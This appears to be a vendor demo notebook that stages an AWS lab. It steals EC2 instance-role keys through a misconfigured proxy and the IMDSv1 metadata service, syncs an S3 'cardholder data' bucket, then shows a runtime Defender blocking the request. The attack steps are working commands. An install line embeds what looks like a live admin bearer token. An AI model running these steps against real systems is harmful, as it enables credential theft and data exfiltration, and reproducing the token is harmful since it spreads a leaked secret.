# __Attack__: Stealing confidential data from S3 via Misconfigured Proxy Server.

## __Summary__: The Defender is important to prevent attacks.

__Without the Defender__ credentials are compromised via Metadata V1 (IMDSv1) service + misconfigured proxy.  
__With the Defender__ credentials are not compromised even with Metadata V1 (IMDSv1) service + misconfigured proxy.  
Most CSPM  will just detect misconfiguration.  
  
__Defender will prevent attackers from exploiting misconfigurations.__  

__Overview__  
Starting as an anonymous outsider with no access or privileges, exploit a misconfigured reverse-proxy server to query the EC2 metadata V1 service and acquire instance profile keys. Then, use those keys to discover, access, and exfiltrate sensitive data from an S3 bucket.  
  
Normally, CSPM will detect Metadata V1 service but will fail to prevent any such attacks in real-time. 

![image.png](attachment:47825de6-dfb5-4dc0-b39b-7d84f47c84a5.png)

### __LAB SETUP__ (Complete BEFORE screen sharing begins) 

In [None]:
aws sso login

In [None]:
eval "$(aws configure export-credentials --profile default --format env)"

In [None]:
cd /Users/leichenbaum/Documents/git_repos/demo/attack_lab_script/aws

unamestr=$(uname)

#get public ip
IP=$(curl https://ipinfo.io/ip)

if [[ $unamestr == 'Darwin' ]]; then
    RANDOM_STRING=`echo $RANDOM | md5 | head -c 20;`
else
    RANDOM_STRING=`echo $RANDOM | md5sum | head -c 20;`
fi

# create temp directory
mkdir $(pwd)/temp-lab
mkdir $(pwd)/temp-lab/cloud_s3_breach-lab-server

[ -d $(pwd)/temp-lab/cloud_s3_breach-lab-server/terraform ] && { echo "Directory Already Exist" && exit; }

cp -r $(pwd)/cloud_s3_breach/terraform temp-lab/cloud_s3_breach-lab-server/
cp -r $(pwd)/cloud_s3_breach/assets temp-lab/cloud_s3_breach-lab-server/
cd $(pwd)/temp-lab/cloud_s3_breach-lab-server/terraform
# terraform module install
ssh-keygen -b 4096 -t rsa -f ./panw -q -N ""
terraform init
terraform apply -var cgid=$RANDOM_STRING -var cg_whitelist=$IP/32 --auto-approve

In [None]:
export panw_output_aws_account_id=$(terraform output -raw panw_output_aws_account_id | sed 's/\s*=\s*/=/g' )
export panw_output_target_ec2_server_ip=$(terraform output -raw panw_output_target_ec2_server_ip | sed 's/\s*=\s*/=/g' )

# __Attack__: Demonstrate the Attack Steps

__Run curl on output IP and notice the error "This server is configured to proxy requests to the EC2 metadata service. Please modify your request's 'host' header and try again."__  

In [None]:
curl $panw_output_target_ec2_server_ip

__Get the IAM user by running the below command__  

In [None]:
curl -s http://${panw_output_target_ec2_server_ip}/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'

Set value to a variable for ease.

In [None]:
targetRole=$(curl -s http://${panw_output_target_ec2_server_ip}/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254')

__Get the IAM user credential by running the below command__  

In [None]:
curl http:/${panw_output_target_ec2_server_ip}/latest/meta-data/iam/security-credentials/${targetRole} -H 'Host:169.254.169.254'

Set values to variables for ease.

In [None]:
target_aws_access_key_id=$(curl http:/${panw_output_target_ec2_server_ip}/latest/meta-data/iam/security-credentials/${targetRole} -H 'Host:169.254.169.254' | jq -r '.AccessKeyId')
target_aws_secret_access_key=$(curl http:/${panw_output_target_ec2_server_ip}/latest/meta-data/iam/security-credentials/${targetRole} -H 'Host:169.254.169.254' | jq -r '.SecretAccessKey')
target_aws_session_token=$(curl http:/${panw_output_target_ec2_server_ip}/latest/meta-data/iam/security-credentials/${targetRole} -H 'Host:169.254.169.254' | jq -r '.Token')

In [None]:
sed -i -e '/erratic/,+3d' ~/.aws/credentials
echo "[erratic]" >> ~/.aws/credentials
echo "aws_access_key_id=${target_aws_access_key_id}" >> ~/.aws/credentials
echo "aws_secret_access_key=${target_aws_secret_access_key}" >> ~/.aws/credentials
echo "aws_session_token=${target_aws_session_token}" >> ~/.aws/credentials

__List all s3 buckets available through the IAM user by running the below command__ 

In [None]:
aws s3 ls --profile erratic | awk '{print $3}'

In [None]:
targetBucket=$(aws s3 ls --profile erratic | awk '{print $3}')

__Download confidential data from the s3 bucket using the below command__ 

In [None]:
aws s3 sync s3://$targetBucket ./cardholder-data --profile erratic

__View Target Data__  

In [None]:
head ./cardholder-data/cardholder_data_primary.csv

# __Defense__: How to prevent attack with WAAS Agent:  
WAAS will help you in protecting from stealing access key and token through metadata exploit as its block the request by detecting and preventing it through runtime prevention. 

![image.png](attachment:ccfc7610-bfb8-40e8-9bc9-7917df1fa670.png)

__Go to Manage > Defenders > Defenders: Deployed > Manual deploy__ 

![image.png](attachment:80ef8517-1ff2-4c8b-a6ad-98325c9b0233.png)

__SSH into vulnerable EC2 and install Defender__ (Replace CMD below from Commercial East Tenant)

In [None]:
installCmd='curl -sSL --header "authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoibGVpY2hlbmJhdW1AcGFsb2FsdG9uZXR3b3Jrcy5jb20iLCJyb2xlIjoiYWRtaW4iLCJyb2xlUGVybXMiOltbMjU1LDI1NSwyNTUsMjU1LDI1NSw5NV0sWzI1NSwyNTUsMjU1LDI1NSwyNTUsOTVdXSwic2Vzc2lvblRpbWVvdXRTZWMiOjQzNSwic2Fhc1Rva2VuIjoiZXlKaGJHY2lPaUpJVXpJMU5pSjkuZXlKemRXSWlPaUpzWldsamFHVnVZbUYxYlVCd1lXeHZZV3gwYjI1bGRIZHZjbXR6TG1OdmJTSXNJbk5sY25acFkyVlZjMkZuWlU5dWJIa2lPblJ5ZFdVc0ltWnBjbk4wVEc5bmFXNGlPbVpoYkhObExDSndjbWx6YldGSlpDSTZJakV3T0RFek5EUTJOVEU1TURBek5qSTNOVElpTENKcGNFRmtaSEpsYzNNaU9pSXpOQzQ0TWk0eE16Z3VNVFV5SWl3aWFYTnpJam9pYUhSMGNITTZMeTloY0drMExuQnlhWE50WVdOc2IzVmtMbWx2SWl3aWNtVnpkSEpwWTNRaU9qQXNJblZ6WlhKU2IyeGxWSGx3WlVSbGRHRnBiSE1pT25zaWFHRnpUMjVzZVZKbFlXUkJZMk5sYzNNaU9tWmhiSE5sZlN3aWRYTmxjbEp2YkdWVWVYQmxUbUZ0WlNJNklsTjVjM1JsYlNCQlpHMXBiaUlzSW1selUxTlBVMlZ6YzJsdmJpSTZabUZzYzJVc0lteGhjM1JNYjJkcGJsUnBiV1VpT2pFM05ETTFNelE1TlRBMU1UZ3NJbUYxWkNJNkltaDBkSEJ6T2k4dllYQnBOQzV3Y21semJXRmpiRzkxWkM1cGJ5SXNJblZ6WlhKU2IyeGxWSGx3WlVsa0lqb3hMQ0poZFhSb0xXMWxkR2h2WkNJNklsQkJUbDlUUVUxTU1pSXNJbk5sYkdWamRHVmtRM1Z6ZEc5dFpYSk9ZVzFsSWpvaVVHRnNieUJCYkhSdklFNWxkSGR2Y210eklDaFVSVk5VSUVGRFExUXBJQzBnT1RBME1EY3hNemN3TkRNMU9EVTFNak0yTUNJc0luTmxjM05wYjI1VWFXMWxiM1YwSWpvek1Dd2lkWE5sY2xKdmJHVkpaQ0k2SW1Rd1kyRTFOV1JpTFdJek9HRXROR1V6WmkwNU5tRTJMVE0yT1RNMU1tVmlZamRrT1NJc0ltaGhjMFJsWm1WdVpHVnlVR1Z5YldsemMybHZibk1pT25SeWRXVXNJbVY0Y0NJNk1UYzBNelV6T1RFMk9Dd2lhV0YwSWpveE56UXpOVE00TlRZNExDSjFjMlZ5Ym1GdFpTSTZJbXhsYVdOb1pXNWlZWFZ0UUhCaGJHOWhiSFJ2Ym1WMGQyOXlhM011WTI5dElpd2lkWE5sY2xKdmJHVk9ZVzFsSWpvaVUzbHpkR1Z0SUVGa2JXbHVJbjAuRnBFNXFnSDk2SEhzUzFQTVhTbkhtcnBzS0tNRFk4d0UzcHQ4UGxqUzN2NCIsImlzcyI6InR3aXN0bG9jayIsImV4cCI6MTc0MzU0MjMzM30.7gOY8ghu1-OPG_N_WViMwGuTd5a1DAdFf6oAAyc1d0Y" -X POST https://us-west1.cloud.twistlock.com/us-4-161058131/api/v1/scripts/defender.sh | sudo bash -s -- -c "us-west1.cloud.twistlock.com" -v --install-host'

In [None]:
ssh -o StrictHostKeyChecking=accept-new -i /Users/leichenbaum/Documents/git_repos/demo/attack_lab_script/aws/temp-lab/cloud_s3_breach-lab-server/terraform/panw ubuntu@$panw_output_target_ec2_server_ip $installCmd

__Go to Defend > WAAS > Host > Add Rule and click on Add new app__

![image.png](attachment:e9b4a5cb-151f-496f-8c07-bfed22cb636a.png)

__Attempt to curl the access key & token after rule set to alert, then prevent__  

In [None]:
curl http:/${panw_output_target_ec2_server_ip}/latest/meta-data/iam/security-credentials/${targetRole} -H 'Host:169.254.169.254' > ./${panw_output_target_ec2_server_ip}-OUT.html && open ./${panw_output_target_ec2_server_ip}-OUT.html

In [1]:
# Heading

### __CLEANUP__

Set WaaS rule back to ALERT

In [None]:
echo $RANDOM_STRING
echo $IP

In [None]:
cd /Users/leichenbaum/Documents/git_repos/demo/attack_lab_script/aws
cd $(pwd)/temp-lab/cloud_s3_breach-lab-server/terraform
terraform destroy -var cgid=$RANDOM_STRING -var cg_whitelist=$IP/32 --auto-approve
#AWS_ACCESS_KEY_ID=$waasdemo_aws_access_key_id AWS_SECRET_ACCESS_KEY=$waasdemo_aws_secret_access_key AWS_SESSION_TOKEN=$waasdemo_aws_session_token terraform destroy -var cgid=$RANDOM_STRING -var cg_whitelist=$IP/32 --auto-approve
cd /Users/leichenbaum/Documents/git_repos/demo/attack_lab_script/aws
rm -r ./temp-lab

Cleanup AWS Credentials File

In [None]:
sed -i -e '/erratic/,+3d' ~/.aws/credentials

In [None]:
cat ~/.aws/credentials